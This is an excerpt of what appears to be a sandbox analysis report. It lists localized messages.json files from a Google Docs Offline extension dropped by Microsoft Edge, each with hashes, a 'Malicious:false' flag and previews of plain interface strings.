                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir1096_770348966\CRX_INSTALL\_locales\si\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2846
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.7416822879702547
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:YWi+htQTKEQb3aXQYJLSWy7sTQThQTnQtQTrEmQ6kiLsegQSJFwsQGaiPn779I+S:zhiTK5b3tUGVjTGTnQiTryOLpyaxYf/S
                                                                                                                                                                                                                                                                                    MD5:B8A4FD612534A171A9A03C1984BB4BDD
                                                                                                                                                                                                                                                                                    SHA1:F513F7300827FE352E8ECB5BD4BB1729F3A0E22A
                                                                                                                                                                                                                                                                                    SHA-256:54241EBE651A8344235CC47AFD274C080ABAEBC8C3A25AFB95D8373B6A5670A2
                                                                                                                                                                                                                                                                                    SHA-512:C03E35BFDE546AEB3245024EF721E7E606327581EFE9EAF8C5B11989D9033BDB58437041A5CB6D567BAA05466B6AAF054C47F976FD940EEEDF69FDF80D79095B
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"createnew":{"message":"\u0db1\u0dc0 \u0dbd\u0dda\u0d9b\u0db1\u0dba\u0d9a\u0dca \u0dc3\u0dcf\u0daf\u0db1\u0dca\u0db1"},"explanationofflinedisabled":{"message":"\u0d94\u0db6 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2\u0dba. \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd \u0dc3\u0db8\u0dca\u0db6\u0db1\u0dca\u0db0\u0dad\u0dcf\u0dc0\u0d9a\u0dca \u0db1\u0ddc\u0db8\u0dd0\u0dad\u0dd2\u0dc0 Google Docs \u0db7\u0dcf\u0dc0\u0dd2\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8\u0da7, Google Docs \u0db8\u0dd4\u0dbd\u0dca \u0db4\u0dd2\u0da7\u0dd4\u0dc0 \u0db8\u0dad \u0dc3\u0dd0\u0d9a\u0dc3\u0dd3\u0db8\u0dca \u0dc0\u0dd9\u0dad \u0d9c\u0ddc\u0dc3\u0dca \u0d94\u0db6 \u0d8a\u0dc5\u0d9f \u0d85\u0dc0\u0dc3\u0dca\u0dae\u0dcf\u0dc0\u0dda \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd\u0dba\u0da7 \u0dc3\u0db6\u0dd0\u0db3\u0dd2 \u0dc0\u0dd2\u0da7 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2 \u0dc3\u0db8\u0db8\u0dd4\u0dc4\u0dd4\u0dbb\u0dca\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8 \u0d9a\u0dca\u200d\u0dbb\u0dd2\u0dba\u0dc

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir1096_770348966\CRX_INSTALL\_locales\sk\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):934
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.882122893545996
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAF8pMv1RS4LXL22IUjdh8uJwpPqLDEtxKLhSS:hyv1RS4LXx38u36QsS
                                                                                                                                                                                                                                                                                    MD5:8E55817BF7A87052F11FE554A61C52D5
                                                                                                                                                                                                                                                                                    SHA1:9ABDC0725FE27967F6F6BE0DF5D6C46E2957F455
                                                                                                                                                                                                                                                                                    SHA-256:903060EC9E76040B46DEB47BBB041D0B28A6816CB9B892D7342FC7DC6782F87C
                                                                                                                                                                                                                                                                                    SHA-512:EFF9EC7E72B272DDE5F29123653BC056A4BC2C3C662AE3C448F8CB6A4D1865A0679B7E74C1B3189F3E262109ED6BC8F8D2BDE14AEFC8E87E0F785AE4837D01C7
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "VYTVORI. NOV.".. },.. "explanationofflinedisabled": {.. "message": "Ste offline. Ak chcete pou.i. Dokumenty Google bez pripojenia na internet, po najbli..om pripojen. na internet prejdite do nastaven. na domovskej str.nke Dokumentov Google a.zapnite offline synchroniz.ciu.".. },.. "explanationofflineenabled": {.. "message": "Ste offline, no st.le m..ete upravova. dostupn. s.bory a.vytv.ra. nov..".. },.. "extdesc": {.. "message": ".prava, tvorba a.zobrazenie dokumentov, tabuliek a.prezent.ci.. To v.etko bez pr.stupu na internet.".. },.. "extname": {.. "message": "Dokumenty Google v re.ime offline".. },.. "learnmore": {.. "message": ".al.ie inform.cie".. },.. "popuphelptext": {.. "message": "P..te, upravujte a.spolupracuje, kdeko.vek ste, a.to s.pripojen.m na internet aj bez neho.".. }..}..

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir1096_770348966\CRX_INSTALL\_locales\sl\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):963
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.6041913416245
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvgfECBxNFCEuKXowwJrpvPwNgEcPJJJEfWOCBxeFCJuGuU4KYXCSUXKDxX4A:1HAXMKYw8VYNLcaeDmKYLdX2zJBG5
                                                                                                                                                                                                                                                                                    MD5:BFAEFEFF32813DF91C56B71B79EC2AF4
                                                                                                                                                                                                                                                                                    SHA1:F8EDA2B632610972B581724D6B2F9782AC37377B
                                                                                                                                                                                                                                                                                    SHA-256:AAB9CF9098294A46DC0F2FA468AFFF7CA7C323A1A0EFA70C9DB1E3A4DA05D1D4
                                                                                                                                                                                                                                                                                    SHA-512:971F2BBF5E9C84DE3D31E5F2A4D1A00D891A2504F8AF6D3F75FC19056BFD059A270C4C9836AF35258ABA586A1888133FB22B484F260C1CBC2D1D17BC3B4451AA
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "USTVARI NOVO".. },.. "explanationofflinedisabled": {.. "message": "Nimate vzpostavljene povezave. .e .elite uporabljati Google Dokumente brez internetne povezave, odprite nastavitve na doma.i strani Google Dokumentov in vklopite sinhronizacijo brez povezave, ko naslednji. vzpostavite internetno povezavo.".. },.. "explanationofflineenabled": {.. "message": "Nimate vzpostavljene povezave, vendar lahko .e vedno urejate razpolo.ljive datoteke ali ustvarjate nove.".. },.. "extdesc": {.. "message": "Urejajte, ustvarjajte in si ogledujte dokumente, preglednice in predstavitve . vse to brez internetnega dostopa.".. },.. "extname": {.. "message": "Google Dokumenti brez povezave".. },.. "learnmore": {.. "message": "Ve. o tem".. },.. "popuphelptext": {.. "message": "Pi.ite, urejajte in sodelujte, kjer koli ste, z internetno povezavo ali brez nje.".. }..}..

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir1096_770348966\CRX_INSTALL\_locales\sr\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1320
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.569671329405572
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HArg/fjQg2JwrfZtUWTrw1P4epMnRGi5TBmuPDRxZQ/XtiCw/Rwh/Q9EVz:ogUg2JwDZe6rwKI8VTP9xK1CwhI94
                                                                                                                                                                                                                                                                                    MD5:7F5F8933D2D078618496C67526A2B066
                                                                                                                                                                                                                                                                                    SHA1:B7050E3EFA4D39548577CF47CB119FA0E246B7A4
                                                                                                                                                                                                                                                                                    SHA-256:4E8B69E864F57CDDD4DC4E4FAF2C28D496874D06016BC22E8D39E0CB69552769
                                                                                                                                                                                                                                                                                    SHA-512:0FBAB56629368EEF87DEEF2977CA51831BEB7DEAE98E02504E564218425C751853C4FDEAA40F51ECFE75C633128B56AE105A6EB308FD5B4A2E983013197F5DBA
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "....... ....".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. ..... ......... Google ......... ... ........ ...., ..... . .......... .. ........ ........ Google .......... . ........ ...... .............. ... ....... ... ...... ........ .. ...........".. },.. "explanationofflineenabled": {.. "message": "...... ..., ... . .... ...... .. ....... ...... . ........ ........ ... .. ....... .....".. },.. "extdesc": {.. "message": "....... . ........... ........., ...... . ............ . ....... ...... . ... . ... .. ... ........ .........".. },.. "extname": {.. "message

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir1096_770348966\CRX_INSTALL\_locales\sv\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):884
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.627108704340797
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HA0NOYT/6McbnX/yzklyOIPRQrJlvDymvBd:vNOcyHnX/yg0P4Bymn
                                                                                                                                                                                                                                                                                    MD5:90D8FB448CE9C0B9BA3D07FB8DE6D7EE
                                                                                                                                                                                                                                                                                    SHA1:D8688CAC0245FD7B886D0DEB51394F5DF8AE7E84
                                                                                                                                                                                                                                                                                    SHA-256:64B1E422B346AB77C5D1C77142685B3FF7661D498767D104B0C24CB36D0EB859
                                                                                                                                                                                                                                                                                    SHA-512:6D58F49EE3EF0D3186EA036B868B2203FE936CE30DC8E246C32E90B58D9B18C624825419346B62AF8F7D61767DBE9721957280AA3C524D3A5DFB1A3A76C00742
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "SKAPA NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du .r offline. Om du vill anv.nda Google Dokument utan internetuppkoppling, .ppna inst.llningarna p. Google Dokuments startsida och aktivera offlinesynkronisering n.sta g.ng du .r ansluten till internet.".. },.. "explanationofflineenabled": {.. "message": "Du .r offline, men det g.r fortfarande att redigera tillg.ngliga filer eller skapa nya.".. },.. "extdesc": {.. "message": "Redigera, skapa och visa dina dokument, kalkylark och presentationer . helt utan internet.tkomst.".. },.. "extname": {.. "message": "Google Dokument Offline".. },.. "learnmore": {.. "message": "L.s mer".. },.. "popuphelptext": {.. "message": "Skriv, redigera och samarbeta .verallt, med eller utan internetanslutning.".. }..}..

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir1096_770348966\CRX_INSTALL\_locales\sw\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):980
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.50673686618174
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvgNHCBxNx1HMHyMhybK7QGU78oCuafIvfCBxex6EYPE5E1pOCSUJqONtCBh8:1HAGDQ3y0Q/Kjp/zhDoKMkeAT6dBaX
                                                                                                                                                                                                                                                                                    MD5:D0579209686889E079D87C23817EDDD5
                                                                                                                                                                                                                                                                                    SHA1:C4F99E66A5891973315D7F2BC9C1DAA524CB30DC
                                                                                                                                                                                                                                                                                    SHA-256:0D20680B74AF10EF8C754FCDE259124A438DCE3848305B0CAF994D98E787D263
                                                                                                                                                                                                                                                                                    SHA-512:D59911F91ED6C8FF78FD158389B4D326DAF4C031B940C399569FE210F6985E23897E7F404B7014FC7B0ACEC086C01CC5F76354F7E5D3A1E0DEDEF788C23C2978
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "FUNGUA MPYA".. },.. "explanationofflinedisabled": {.. "message": "Haupo mtandaoni. Ili uweze kutumia Hati za Google bila muunganisho wa intaneti, wakati utakuwa umeunganishwa kwenye intaneti, nenda kwenye sehemu ya mipangilio kwenye ukurasa wa kwanza wa Hati za Google kisha uwashe kipengele cha usawazishaji nje ya mtandao.".. },.. "explanationofflineenabled": {.. "message": "Haupo mtandaoni, lakini bado unaweza kubadilisha faili zilizopo au uunde mpya.".. },.. "extdesc": {.. "message": "Badilisha, unda na uangalie hati, malahajedwali na mawasilisho yako . yote bila kutumia muunganisho wa intaneti.".. },.. "extname": {.. "message": "Hati za Google Nje ya Mtandao".. },.. "learnmore": {.. "message": "Pata Maelezo Zaidi".. },.. "popuphelptext": {.. "message": "Andika hati, zibadilishe na ushirikiane na wengine popote ulipo, iwe una muunganisho wa intaneti au huna.".. }..}..

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir1096_770348966\CRX_INSTALL\_locales\ta\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1941
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.132139619026436
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAoTZwEj3YfVLiANpx96zjlXTwB4uNJDZwq3CP1B2xIZiIH1CYFIZ03SoFyxrph:JCEjWiAD0ZXkyYFyPND1L/I
                                                                                                                                                                                                                                                                                    MD5:DCC0D1725AEAEAAF1690EF8053529601
                                                                                                                                                                                                                                                                                    SHA1:BB9D31859469760AC93E84B70B57909DCC02EA65
                                                                                                                                                                                                                                                                                    SHA-256:6282BF9DF12AD453858B0B531C8999D5FD6251EB855234546A1B30858462231A
                                                                                                                                                                                                                                                                                    SHA-512:6243982D764026D342B3C47C706D822BB2B0CAFFA51F0591D8C878F981EEF2A7FC68B76D012630B1C1EB394AF90EB782E2B49329EB6538DD5608A7F0791FDCF5
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "..... ....... .........".. },.. "explanationofflinedisabled": {.. "message": ".......... ........... .... ....... ..... Google ......... .........., ...... .... ........... ......... ...., Google ... ................... ................ ......, ........ ......... ..........".. },.. "explanationofflineenabled": {.. "message": ".......... ..........., .......... .......... .......... ......... ........... ...... .....

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir1096_770348966\CRX_INSTALL\_locales\te\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1969
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.327258153043599
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:R7jQrEONienBcFNBNieCyOBw0/kCcj+sEf24l+Q+u1LU4ljCj55ONipR41ssrNix:RjQJN1nBcFNBNlCyGcj+RXl+Q+u1LU4s
                                                                                                                                                                                                                                                                                    MD5:385E65EF723F1C4018EEE6E4E56BC03F
                                                                                                                                                                                                                                                                                    SHA1:0CEA195638A403FD99BAEF88A360BD746C21DF42
                                                                                                                                                                                                                                                                                    SHA-256:026C164BAE27DBB36A564888A796AA3F188AAD9E0C37176D48910395CF772CEA
                                                                                                                                                                                                                                                                                    SHA-512:E55167CB5638E04DF3543D57C8027B86B9483BFCAFA8E7C148EDED66454AEBF554B4C1CF3C33E93EC63D73E43800D6A6E7B9B1A1B0798B6BDB2F699D3989B052
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "..... ...... ........ ......".. },.. "explanationofflinedisabled": {.. "message": ".... ........... ........ ......... ........ ....... Google Docs... .............., .... ............ ....... ..... ...... .... Google Docs .... ...... ............. ......, ........ ........ ... .......".. },.. "explanationofflineenabled": {.. "message": ".... ........... ......., .... .... ........ .......... .... ....... ..... ....... .... ..

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir1096_770348966\CRX_INSTALL\_locales\th\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1674
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.343724179386811
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:fcGjnU3UnGKD1GeU3pktOggV1tL2ggG7Q:f3jnDG1eUk0g6RLE
                                                                                                                                                                                                                                                                                    MD5:64077E3D186E585A8BEA86FF415AA19D
                                                                                                                                                                                                                                                                                    SHA1:73A861AC810DABB4CE63AD052E6E1834F8CA0E65
                                                                                                                                                                                                                                                                                    SHA-256:D147631B2334A25B8AA4519E4A30FB3A1A85B6A0396BC688C68DC124EC387D58
                                                                                                                                                                                                                                                                                    SHA-512:56DD389EB9DD335A6214E206B3BF5D63562584394D1DE1928B67D369E548477004146E6CB2AD19D291CB06564676E2B2AC078162356F6BC9278B04D29825EF0C
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": ".............. ............. Google .................................... ............................... Google ...... .................................................................".. },.. "explanationofflineenabled": {.. "message": "................................................................".. },.. "extdesc": {.. "message": "..... ..... ........

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir1096_770348966\CRX_INSTALL\_locales\tr\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1063
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.853399816115876
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAowYuBPgoMC4AGehrgGm7tJ3ckwFrXnRs5m:GYsPgrCtGehkGc3cvXr
                                                                                                                                                                                                                                                                                    MD5:76B59AAACC7B469792694CF3855D3F4C
                                                                                                                                                                                                                                                                                    SHA1:7C04A2C1C808FA57057A4CCEEE66855251A3C231
                                                                                                                                                                                                                                                                                    SHA-256:B9066A162BEE00FD50DC48C71B32B69DFFA362A01F84B45698B017A624F46824
                                                                                                                                                                                                                                                                                    SHA-512:2E507CA6874DE8028DC769F3D9DFD9E5494C268432BA41B51568D56F7426F8A5F2E5B111DDD04259EB8D9A036BB4E3333863A8FC65AAB793BCEF39EDFE41403B
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "YEN. OLU.TUR".. },.. "explanationofflinedisabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Google Dok.manlar'. .nternet ba.lant.s. olmadan kullanmak i.in, .nternet'e ba.lanabildi.inizde Google Dok.manlar ana sayfas.nda Ayarlar'a gidin ve .evrimd... senkronizasyonu etkinle.tirin.".. },.. "explanationofflineenabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Ancak, yine de mevcut dosyalar. d.zenleyebilir veya yeni dosyalar olu.turabilirsiniz.".. },.. "extdesc": {.. "message": "Dok.man, e-tablo ve sunu olu.turun, bunlar. d.zenleyin ve g.r.nt.leyin. T.m bu i.lemleri internet eri.imi olmadan yapabilirsiniz.".. },.. "extname": {.. "message": "Google Dok.manlar .evrimd...".. },.. "learnmore": {.. "message": "Daha Fazla Bilgi".. },.. "popuphelptext": {.. "message": ".nternet ba.lant.n.z olsun veya olmas.n, nerede olursan.z olun yaz.n, d.zenl

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir1096_770348966\CRX_INSTALL\_locales\uk\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1333
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.686760246306605
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAk9oxkm6H4KyGGB9GeGoxPEYMQhpARezTtHUN97zlwpEH7:VKU1GB9GeBc/OARETt+9/WCb
                                                                                                                                                                                                                                                                                    MD5:970963C25C2CEF16BB6F60952E103105
                                                                                                                                                                                                                                                                                    SHA1:BBDDACFEEE60E22FB1C130E1EE8EFDA75EA600AA
                                                                                                                                                                                                                                                                                    SHA-256:9FA26FF09F6ACDE2457ED366C0C4124B6CAC1435D0C4FD8A870A0C090417DA19
                                                                                                                                                                                                                                                                                    SHA-512:1BED9FE4D4ADEED3D0BC8258D9F2FD72C6A177C713C3B03FC6F5452B6D6C2CB2236C54EA972ECE7DBFD756733805EB2352CAE44BAB93AA8EA73BB80460349504
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "........".. },.. "explanationofflinedisabled": {.. "message": ".. . ...... ....... ... ............. Google ........... ... ......... . .........., ......... . ............ .. ........ ........ Google .......... . ......... ......-............., .... ...... . .......".. },.. "explanationofflineenabled": {.. "message": ".. . ...... ......, ..... ... .... ...... .......... ........ ..... ... .......... .....".. },.. "extdesc": {.. "message": "........., ......... . ............ ........., .......... ....... .. ........... ... ....... .. ..........".. },.. "extname": {.. "message": "Goo

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir1096_770348966\CRX_INSTALL\_locales\ur\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1263
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.861856182762435
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAl3zNEUhN3mNjkSIkmdNpInuUVsqNtOJDhY8Dvp/IkLzx:e3uUhQKvkmd+s11Lp1F
                                                                                                                                                                                                                                                                                    MD5:8B4DF6A9281333341C939C244DDB7648
                                                                                                                                                                                                                                                                                    SHA1:382C80CAD29BCF8AAF52D9A24CA5A6ECF1941C6B
                                                                                                                                                                                                                                                                                    SHA-256:5DA836224D0F3A96F1C5EB5063061AAD837CA9FC6FED15D19C66DA25CF56F8AC
                                                                                                                                                                                                                                                                                    SHA-512:FA1C015D4EA349F73468C78FDB798D462EEF0F73C1A762298798E19F825E968383B0A133E0A2CE3B3DF95F24C71992235BFC872C69DC98166B44D3183BF8A9E5
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "... ......".. },.. "explanationofflinedisabled": {.. "message": ".. .. .... .... Google Docs .. .... ....... ..... ....... .... ..... .... ... .. .. ....... .. ..... ... .. Google Docs ... ... .. ....... .. ..... ... .. .... ...... ..... .. .. .....".. },.. "explanationofflineenabled": {.. "message": ".. .. .... ... .... .. ... ... ...... ..... ... ..... .. .... ... .. ... ..... ... .... ....".. },.. "extdesc": {.. "message": ".......... .......... ... ....... . .... ... ....... .. ..... .. .... ...... ..... .... ... ..... .......".. },.. "extname": {.. "message": "Google Docs .. ....".. },.. "learnmore": {..

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir1096_770348966\CRX_INSTALL\_locales\vi\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1074
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.062722522759407
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAhBBLEBOVUSUfE+eDFmj4BLErQ7e2CIer32KIxqJ/HtNiE5nIGeU+KCVT:qHCDheDFmjDQgX32/S/hI9jh
                                                                                                                                                                                                                                                                                    MD5:773A3B9E708D052D6CBAA6D55C8A5438
                                                                                                                                                                                                                                                                                    SHA1:5617235844595D5C73961A2C0A4AC66D8EA5F90F
                                                                                                                                                                                                                                                                                    SHA-256:597C5F32BC999746BC5C2ED1E5115C523B7EB1D33F81B042203E1C1DF4BBCAFE
                                                                                                                                                                                                                                                                                    SHA-512:E5F906729E38B23F64D7F146FA48F3ABF6BAED9AAFC0E5F6FA59F369DC47829DBB4BFA94448580BD61A34E844241F590B8D7AEC7091861105D8EBB2590A3BEE9
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "T.O M.I".. },.. "explanationofflinedisabled": {.. "message": "B.n .ang ngo.i tuy.n. .. s. d.ng Google T.i li.u m. kh.ng c.n k.t n.i Internet, .i ..n c.i ..t tr.n trang ch. c.a Google T.i li.u v. b.t ..ng b. h.a ngo.i tuy.n v.o l.n ti.p theo b.n ...c k.t n.i v.i m.ng Internet.".. },.. "explanationofflineenabled": {.. "message": "B.n .ang ngo.i tuy.n, tuy nhi.n b.n v.n c. th. ch.nh s.a c.c t.p c. s.n ho.c t.o c.c t.p m.i.".. },.. "extdesc": {.. "message": "Ch.nh s.a, t.o v. xem t.i li.u, b.ng t.nh v. b.n tr.nh b.y . t.t c. m. kh.ng c.n truy c.p Internet.".. },.. "extname": {.. "message": "Google T.i li.u ngo.i tuy.n".. },.. "learnmore": {.. "message": "Ti.m hi..u th.m".. },.. "popuphelptext": {.. "message": "Vi.t, ch.nh s.a v. c.ng t.c

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir1096_770348966\CRX_INSTALL\_locales\zh_CN\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):879
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.7905809868505544
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvgteHCBxNtSBXuetOrgIkA2OrWjMOCBxetSBXK01fg/SOiCSUEQ27e1CBhUj:1HAFsHtrIkA2jqldI/727eggcLk9pf
                                                                                                                                                                                                                                                                                    MD5:3E76788E17E62FB49FB5ED5F4E7A3DCE
                                                                                                                                                                                                                                                                                    SHA1:6904FFA0D13D45496F126E58C886C35366EFCC11
                                                                                                                                                                                                                                                                                    SHA-256:E72D0BB08CC3005556E95A498BD737E7783BB0E56DCC202E7D27A536616F5EE0
                                                                                                                                                                                                                                                                                    SHA-512:F431E570AB5973C54275C9EEF05E49E6FE2D6C17000F98D672DD31F9A1FAD98E0D50B5B0B9CF85D5BBD3B655B93FD69768C194C8C1688CB962AA75FF1AF9BDB6
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "..".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ................ Google ....................".. },.. "explanationofflineenabled": {.. "message": ".............................".. },.. "extdesc": {.. "message": "...................... - ........".. },.. "extname": {.. "message": "Google .......".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "...............................".. }..}..

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir1096_770348966\CRX_INSTALL\_locales\zh_HK\messages.json

